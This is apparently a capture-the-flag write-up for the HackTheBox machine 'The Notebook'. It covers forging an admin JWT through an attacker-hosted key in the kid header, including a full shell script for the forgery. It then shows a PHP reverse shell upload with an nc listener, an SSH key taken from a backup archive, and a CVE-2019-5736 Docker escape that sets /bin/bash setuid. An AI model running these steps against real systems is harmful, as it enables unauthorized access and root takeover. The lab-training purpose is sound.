# The Notebook

## The Notebook - Hackthebox

OS: Linux

Difficulty: Medium

IP: 10.10.10.230

### Nmap

```
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack
```

### Web

#### First Page

![](https://user-images.githubusercontent.com/53917092/114756314-fd624900-9d30-11eb-99c4-8cff2b74c127.png)

creating an account

![](https://user-images.githubusercontent.com/53917092/114757169-e708bd00-9d31-11eb-9d74-d11784dfe591.png)

![](https://user-images.githubusercontent.com/53917092/114757247-fc7de700-9d31-11eb-9838-dd3e660a01b8.png)

![](https://user-images.githubusercontent.com/53917092/114757280-04d62200-9d32-11eb-8658-3feb00c2ff4d.png)

adding a new note

![](https://user-images.githubusercontent.com/53917092/114757326-16b7c500-9d32-11eb-81b8-9caf506fba23.png)

looking at cookies

> auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6ImEiLCJlbWFpbCI6ImFAYS5jIiwiYWRtaW5fY2FwIjowfQ.X4xL9bF3x0l8Lclj9hIIUa\_HxJcTUvKSh2i\_gH9TyRs4d1rrK2TXR0AxYiJ\_BL5ytJr0VdqQNKunaNobTps4NTOmOZX-hjzugYngjpUo\_dbJsJIXx\_3D49aycKN6qMS7VjrrS8qvZBWU\_Lom3H6w057lFB3ITncrMg4UpaougjNEJbfZChQrDEDGEY01ZJntBOh\_-JiaCUA3uznt9T98j425XObUDCyCaR0VUJF0W8fuKes9cpwehQDcx-0o9Y66aucBcaywz5Ddge96P0NB-l2E8AnJ0P2p8JDOMaoeCX05I8YEoGeEu99ougOfaVWxekP1nvpBPYjplIUxi-dscXShK8zJtqPHAoOzqVsL4SzJvbi\_z8eDUyb5p0CAoUbrxqy44MoJ3JWWER781iemEISTcgUN3Bp\_AlCK23awPR3ikzpz18QJZnHnCGnhJcdxhqFNm93-7jopjIroIGJjKjsV3gVxdqr4kFkoZdrHdpaob47RQd3MU0YfawEk6ZQ7qL2pGX-ZN4LskZ\_83c5ijgch9zdYovLGJ6sfnwhEh91eAIR16Uz5rKDpjCu1zCOlibMZGyMbxml9dBBqiz1apoo99jGVdeYA9JW1iMiLWjmvpGzOkXhRAwT\_OSH3XJ-Hqoj8eSCKY56nJCiDQ0Z5dQyntco01WWOKPYrUi4-HAs

this looks like a JWT: three base64url-encoded parts separated by dots (header, payload, signature)

we can decode it by pasting it into <https://jwt.io>

![](https://user-images.githubusercontent.com/53917092/114758609-8bd7ca00-9d33-11eb-92bd-ff02d36c70de.png)

the header decodes to `{"typ":"JWT","alg":"RS256","kid":"http://localhost:7070/privKey.key"}` and the payload to `{"username":"a","email":"a@a.c","admin_cap":0}`. The `kid` is a URL, which suggests the server fetches the key it verifies with from wherever `kid` points. So we need our own RSA key pair (RS256; the original key looks like 4096-bit from the signature length, but any size works once the server trusts our key), sign a token with `admin_cap=1`, and point `kid` at a copy of that key that we host

we can generate the key pair with <https://cryptotools.net/rsagen>

![](https://user-images.githubusercontent.com/53917092/114910663-8abaa180-9df4-11eb-9b91-75ecf57fa572.png)

![](https://user-images.githubusercontent.com/53917092/114911340-4bd91b80-9df5-11eb-89b6-da40e96e7c31.png)

now create a file called `privKey.key` containing the same private key we sign the JWT with, and serve it over HTTP. Then in the JWT header change `localhost` to your IP, so the server fetches the key from your machine instead of its own. The port in the `kid` URL has to be one your HTTP server actually listens on: `python3 -m http.server` defaults to 8000, so either pass `7070` to it or put `8000` in the `kid`. Now change `admin_cap` to 1, sign with our private key, and we have a valid cookie (JWT) with admin permission

![](https://user-images.githubusercontent.com/53917092/114913248-5d232780-9df7-11eb-9917-5199759d2506.png)

> python3 -m http.server

![](https://user-images.githubusercontent.com/53917092/114913405-880d7b80-9df7-11eb-8a85-e45904903fd0.png)

put this jwt in your browser cookie and reload the page
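The same forgery done from a shell instead of jwt.io, as an added example that is not part of the original writeup. It assumes, as the page observes, that the server fetches the key from the URL in the `kid` header and verifies with it, so a key we host is trusted. It needs only a POSIX shell and `openssl`; the attacker IP and port in `KID` are assumptions.

```shell
#!/bin/sh
# Added example, not from the original writeup: forge the "auth" JWT by hand.
# Assumes the target trusts whatever key the "kid" URL points at (the page's
# observation). The attacker IP/port below are assumptions; use your own.
set -eu

b64url() {            # stdin -> base64url without '=' padding (JWT encoding)
  openssl base64 -A | tr -- '+/' '-_' | tr -d '='
}

b64url_decode() {     # $1 = base64url string -> raw bytes on stdout
  s=$1
  case $(( ${#s} % 4 )) in 2) s="$s==" ;; 3) s="$s=" ;; esac
  printf '%s' "$s" | tr -- '-_' '+/' | openssl base64 -d -A
}

jwt_part() {          # $1 = token, $2 = header|payload -> decoded JSON
  rest=${1#*.}
  if [ "$2" = header ]; then b64url_decode "${1%%.*}"; else b64url_decode "${rest%%.*}"; fi
}

gen_key() {           # $1 = path; writes a fresh 2048-bit RSA private key (PEM)
  openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out "$1" 2>/dev/null
}

forge_jwt() {         # $1 = private key, $2 = kid URL, $3 = payload JSON -> token
  header=$(printf '{"typ":"JWT","alg":"RS256","kid":"%s"}' "$2")
  input="$(printf '%s' "$header" | b64url).$(printf '%s' "$3" | b64url)"
  sig=$(printf '%s' "$input" | openssl dgst -sha256 -sign "$1" | b64url)
  printf '%s.%s' "$input" "$sig"
}

verify_jwt() {        # $1 = private key (public half derived), $2 = token -> 0 if signature checks
  tmp=$(mktemp -d)
  openssl pkey -in "$1" -pubout -out "$tmp/pub.pem" 2>/dev/null
  rest=${2#*.}
  b64url_decode "${rest#*.}" > "$tmp/sig.bin"
  if printf '%s' "${2%.*}" | openssl dgst -sha256 -verify "$tmp/pub.pem" -signature "$tmp/sig.bin" >/dev/null 2>&1
  then rc=0; else rc=1; fi
  rm -rf "$tmp"
  return $rc
}

# Mirror the writeup: new key pair, kid pointing at our host, admin_cap flipped to 1.
WORK=$(mktemp -d)
gen_key "$WORK/privKey.key"                          # must be served under this exact name
KID="http://10.10.14.2:7070/privKey.key"             # assumption: attacker IP and port
TOKEN=$(forge_jwt "$WORK/privKey.key" "$KID" '{"username":"a","email":"a@a.c","admin_cap":1}')
echo "auth=$TOKEN"
# Then serve the key at the kid URL, e.g. (cd "$WORK" && python3 -m http.server 7070),
# and set the printed cookie in the browser.
```

`verify_jwt` is there to check the forged token against our own key before sending it; if the target answers with the admin panel, it fetched and trusted the key from `KID`, and the fix on the server side is to never load key material from a client-controlled `kid`.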

now we can see the "admin panel" tab

![](https://user-images.githubusercontent.com/53917092/114914308-855f5600-9df8-11eb-87c6-8b93902cafb4.png)

we can upload files and view the notes

![](https://user-images.githubusercontent.com/53917092/114914461-afb11380-9df8-11eb-815a-e63121ef6d02.png)

checking out "need to fix config"

![](https://user-images.githubusercontent.com/53917092/114914541-cce5e200-9df8-11eb-8995-416cbd17e402.png)

the config indicates that uploaded PHP files are executed, so we can get a shell by uploading a PHP reverse shell

I used the one from pentestmonkey

download the shell

> curl <https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php> -o rev.php

edit the shell, setting `$ip` to your IP and `$port` to the port your listener will use

![](https://user-images.githubusercontent.com/53917092/114915193-a8d6d080-9df9-11eb-8010-9bfebd01ca83.png)

start a listener

> nc -lvnp 1234

and upload this php

![](https://user-images.githubusercontent.com/53917092/114915535-0d922b00-9dfa-11eb-8a86-4b3222ac87fc.png)

click "view"

and we get a shell as www-data

**getting tty**

> python3 -c 'import pty;pty.spawn("/bin/bash")'

CTRL+Z

> stty raw -echo;fg

> export TERM=xterm

## User

in /var/backups there are some interesting files; passwd.bak and shadow.bak are root-only, but home.tar.gz is world-readable

```
www-data@thenotebook:/tmp$ ls -la /var/backups
total 696
drwxr-xr-x  2 root root     4096 Apr 15 06:26 .
drwxr-xr-x 14 root root     4096 Feb 12 06:52 ..
-rw-r--r--  1 root root    51200 Apr 15 06:25 alternatives.tar.0
-rw-r--r--  1 root root    33252 Feb 24 08:53 apt.extended_states.0
-rw-r--r--  1 root root     3609 Feb 23 08:58 apt.extended_states.1.gz
-rw-r--r--  1 root root     3621 Feb 12 06:52 apt.extended_states.2.gz
-rw-r--r--  1 root root      437 Feb 12 06:17 dpkg.diversions.0
-rw-r--r--  1 root root      172 Feb 12 06:52 dpkg.statoverride.0
-rw-r--r--  1 root root   571460 Feb 24 08:53 dpkg.status.0
-rw-------  1 root root      693 Feb 17 13:18 group.bak
-rw-------  1 root shadow    575 Feb 17 13:18 gshadow.bak
-rw-r--r--  1 root root     4373 Feb 17 09:02 home.tar.gz
-rw-------  1 root root     1555 Feb 12 06:24 passwd.bak
-rw-------  1 root shadow   1024 Feb 12 07:33 shadow.bak
```

so I created a directory inside /tmp/ and extracted the archive there

> cd /tmp

> mkdir a; cd a

> tar -xf /var/backups/home.tar.gz

inside the extracted home backup (/var/backups/home.tar.gz) we find the SSH private key of the "noah" user

> cd home/noah/.ssh

> cat id\_rsa

copy the content to a file on your machine, restrict its permissions (ssh refuses keys that are group- or world-readable) and log in as noah with this key

> chmod 600 id\_rsa

> ssh -i id\_rsa noah\@10.10.10.230

## Privesc

> sudo -l

```
Matching Defaults entries for noah on thenotebook:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User noah may run the following commands on thenotebook:
    (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*
```

we can run `/usr/bin/docker exec -it webapp-dev01*` as root without a password. The trailing `*` is a sudoers wildcard, and sudoers wildcards match across argument boundaries, so anything after `webapp-dev01` is accepted: we can exec any command inside that container as root. We will use that to become root on the host

#### Docker version

> docker -v

```
Docker version 18.06.0-ce, build 0ffa825
```

searching for vulnerabilities in this version

![](https://user-images.githubusercontent.com/53917092/115036274-bf396680-9ea3-11eb-85de-85166770c936.png)

we can try one of these exploits, but they target runc (the container runtime docker uses to start processes), so let's check whether runc exists on the target machine

> which runc

```
/usr/sbin/runc
```

> runc -v

```
runc version 1.0.0~rc6+dfsg1
commit: 1.0.0~rc6+dfsg1-3
spec: 1.0.1
```

runc 1.0.0-rc6 is within the affected range of CVE-2019-5736 (runc through 1.0-rc6), so let's run the exploit

[video to follow](https://www.youtube.com/watch?v=gjvsbcAlQl8)

on the target machine, run this to get a shell inside the docker container

> sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash

in our machine download the exploit from <https://github.com/Frichetten/CVE-2019-5736-PoC>

> curl <https://raw.githubusercontent.com/Frichetten/CVE-2019-5736-PoC/master/main.go> -o main.go

change the payload (the `payload` string in `main.go`; it is a Go string, so the `\n` is a newline escape)

![](https://user-images.githubusercontent.com/53917092/115038782-3e2f9e80-9ea6-11eb-9a90-e06f0905e05b.png)

in this case, I changed the payload to

> \#!/bin/bash \n chmod +s /bin/bash

because the payload runs as root on the host when the exploit fires, and a setuid-root /bin/bash lets any host user get a root shell with `bash -p`

now build the exploit

> go build main.go

start a python3 http server

> python3 -m http.server

inside the container, download and run the exploit (it replaces the container's /bin/sh and waits for the next `docker exec`)

> curl http\://\<your\_ip>:8000/main -o exploit

> chmod +x exploit

> ./exploit

in another terminal, ssh in again as noah and run

> sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh

this exec runs the replaced /bin/sh, which lets the exploit overwrite the host's runc binary with our payload; runc then prints

> 'No help topic for '/bin/sh''

after that message, back on the host (in the noah ssh session, not inside the container), check that /bin/bash is now setuid root and run

> ls -l /bin/bash

> bash -p

`-p` keeps the effective uid of the setuid binary, so we are now root

> cat /root/root.txt
